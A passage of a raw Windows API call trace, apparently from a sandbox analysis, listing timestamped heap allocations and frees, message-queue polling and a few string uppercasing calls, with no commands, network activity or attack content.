wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.814] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.816] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.816] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.816] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.817] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0254.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.820] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.820] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.821] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.860] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.861] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.861] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.861] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.861] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.861] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.862] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.862] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.866] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.866] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.866] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.866] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.867] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.867] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.867] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.868] HeapFree (in: 